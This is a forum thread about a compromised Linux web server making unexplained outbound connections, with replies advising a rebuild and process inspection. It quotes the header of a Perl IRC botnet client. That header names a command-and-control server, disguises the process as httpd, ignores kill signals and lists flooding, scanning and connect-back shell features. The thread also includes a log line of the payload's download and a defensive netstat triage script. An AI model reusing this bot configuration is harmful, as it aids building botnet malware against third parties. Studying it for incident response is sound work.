Linux Server Establishing connections to computers outside my network.

Recently I started to experience problems with my server. Netstat shows this:

tcp 0 1 192.168.0.5:52106 204.101.159.238:80 SYN_SENT 13448/httpd
tcp 0 1 192.168.0.5:38269 204.101.159.238:80 SYN_SENT 13530/httpd
tcp 0 1 192.168.0.5:53470 46.108.158.11:7575 SYN_SENT 19899/stream
tcp 0 1 192.168.0.5:38267 204.101.159.238:80 SYN_SENT 12238/httpd
tcp 0 1 192.168.0.5:52099 204.101.159.238:80 SYN_SENT 14109/httpd
tcp 0 1 192.168.0.5:59646 209.97.193.141:3303 SYN_SENT 16020/php
tcp 0 1 192.168.0.5:52107 204.101.159.238:80 SYN_SENT 11291/httpd
tcp 0 1 192.168.0.5:59648 209.97.193.141:3303 SYN_SENT 16100/php
tcp 0 1 192.168.0.5:59647 209.97.193.141:3303 SYN_SENT 15937/php
tcp 0 1 192.168.0.5:38271 204.101.159.238:80 SYN_SENT 13375/httpd
tcp 0 1 192.168.0.5:52100 204.101.159.238:80 SYN_SENT 20715/httpd
tcp 0 1 192.168.0.5:38270 204.101.159.238:80 SYN_SENT 14100/httpd
tcp 0 1 192.168.0.5:43743 209.97.193.141:3303 SYN_SENT 16187/php
tcp 0 1 192.168.0.5:38272 204.101.159.238:80 SYN_SENT 11293/httpd
tcp 0 1 192.168.0.5:43156 46.108.158.11:7575 SYN_SENT 19905/stream
tcp 0 1 192.168.0.5:38268 204.101.159.238:80 SYN_SENT 13298/httpd
tcp 0 1 192.168.0.5:52102 204.101.159.238:80 SYN_SENT 11287/httpd
tcp 0 1 192.168.0.5:38274 204.101.159.238:80 SYN_SENT 12231/httpd
tcp 0 1 192.168.0.5:52101 204.101.159.238:80 SYN_SENT 20721/httpd

I used an iptables rule to block incoming and outgoing connections to these addresses:

204.101.159.238 (Canada)
209.97.193.141 (Canada)
46.108.158.11 (Romania)

The traffic shows my server generating the connections, but nobody is using the server to establish them. Can anybody let me know what is happening?? Before setting the iptables rule the server generated so much traffic that it overloaded my network. I think it's spyware or a trojan… but in Linux?? Seriously??

Thanks for your help.

Well, these are coming from httpd, php, and stream (whatever that is).
It's possible somebody hacked your box and is now using it for their own
purposes. If you do not know why Apache's httpd is doing these things
then disable it, or maybe better yet, rebuild the box after backing up
whatever the server could be using to make these calls (.php files,
whatever). Maybe set up a LAN trace to see what happens when one of
these connections is actually made, since here you do not see anything
other than the socket list.

Good luck.


I found this in my error_log for Apache:

http://199.115.228.9
Saving to: vp.txt

and checked that file at the address above (my antivirus blocked the connection as soon as it opened); this is the content of the vp.txt file:

#!/usr/bin/perl

# - Added command !estatisticas;
# - Renamed command @pacota to @oldpack;
# - Added two new packeters: @udp and @udpfaixa;
# - Added a new portscan -> @fullportscan;
# - Added command @conback with Windows/Unix support :D;
# - Added command: !sair to terminate the bot;
# - Added command: !novonick to change the bot's nick to a new random one;
# - Added commands !entra and !sai;
# - Added command @download;
# - Added command !pacotes to enable/disable packets :);

########## CONFIGURATION ############
my $processo = '/usr/sbin/httpd -k graceful';

$servidor='204.101.159.238' unless $servidor;
my $porta='80';
my @canais=("#au");
my @adms=("v","p");
my @auth=("!@max.ink");

# Anti Flood ( 6/3 Recommended )
my $linas_max=6;
my $sleep=3;

my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "#";
my $estatisticas = 0;
my $pacotes = 1;
####################################

my $VERSAO = '0.2a';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';

Comparing with the netstat result, the same address that appears there is in the vp.txt file.
I didn't post the full file content, but is there any other way to fix this without reinstalling the full box?

Thanks for the help
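An added triage example, not code from the thread: it parses netstat rows like the listing in the first message, groups outbound SYN_SENT attempts by remote endpoint and originating program, and checks a PID's claimed command name against its real executable, since the $processo line above shows the bot naming itself after httpd. The sample rows and the SERVER_PROGRAMS set are constructed assumptions.

```python
import os
import re
from collections import defaultdict
# Constructed sample in the shape of the netstat output quoted in the thread
# (SYN_SENT rows from httpd/php/stream plus one normal inbound ESTABLISHED row).
SAMPLE_NETSTAT = """\
tcp 0 1 192.168.0.5:52106 204.101.159.238:80 SYN_SENT 13448/httpd
tcp 0 1 192.168.0.5:53470 46.108.158.11:7575 SYN_SENT 19899/stream
tcp 0 1 192.168.0.5:59646 209.97.193.141:3303 SYN_SENT 16020/php
tcp 0 1 192.168.0.5:52107 204.101.159.238:80 SYN_SENT 11291/httpd
tcp 0 0 192.168.0.5:80 10.0.0.7:51234 ESTABLISHED 13448/httpd
"""
LINE_RE = re.compile(r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<lip>\S+):(?P<lport>\d+)\s+"
                     r"(?P<rip>\S+):(?P<rport>\d+)\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)/(?P<prog>\S+)$")
# Assumption: programs that should accept connections on a web server, not originate them.
SERVER_PROGRAMS = {"httpd", "apache2", "php", "php-fpm"}

def parse_netstat(text):
    """Parse 'netstat -tnp'-style rows; lines without a PID/Program column are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            for k in ("lport", "rport", "pid"):
                d[k] = int(d[k])
            rows.append(d)
    return rows

def outbound_by_remote(rows, states=("SYN_SENT",)):
    """Group outbound attempts by remote endpoint, keeping the programs and PIDs
    behind them and whether a server-side program is the originator."""
    out = defaultdict(lambda: {"count": 0, "programs": set(), "pids": set(), "from_server": False})
    for r in rows:
        if r["state"] in states:
            e = out[(r["rip"], r["rport"])]
            e["count"] += 1
            e["programs"].add(r["prog"])
            e["pids"].add(r["pid"])
            e["from_server"] |= r["prog"] in SERVER_PROGRAMS
    return dict(out)

def name_mismatch(cmdline, exe, interpreters=("perl", "python", "sh", "bash")):
    """True when argv[0] (what netstat/ps show) claims a daemon name but the PID's real
    executable is an interpreter; pass /proc/<pid>/cmdline and os.readlink('/proc/<pid>/exe')."""
    argv = cmdline.replace("\0", " ").split()
    claimed = os.path.basename(argv[0]) if argv else ""
    real = os.path.basename(exe)
    return claimed != real and any(real.startswith(i) for i in interpreters)
```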

If you do not know why this file is here then your box is infected. How
much? Who knows. If I were you I'd back up anything important, scan
that backed-up stuff with as many malware/virus-scanners as possible (in
case they are infected in a way that will cause havoc in the future) and
wipe this box.

Good luck.

Are you running some kind of Peer to Peer app?
Not just torrent apps, sometimes social networking apps or apps with social networking features (like Skype) can get really chatty.

Also, inventory what is running.
A starting point is top or htop; other monitoring apps might also tell you more. You can use Wireshark, for example, to see what is inside some of the packets.

TS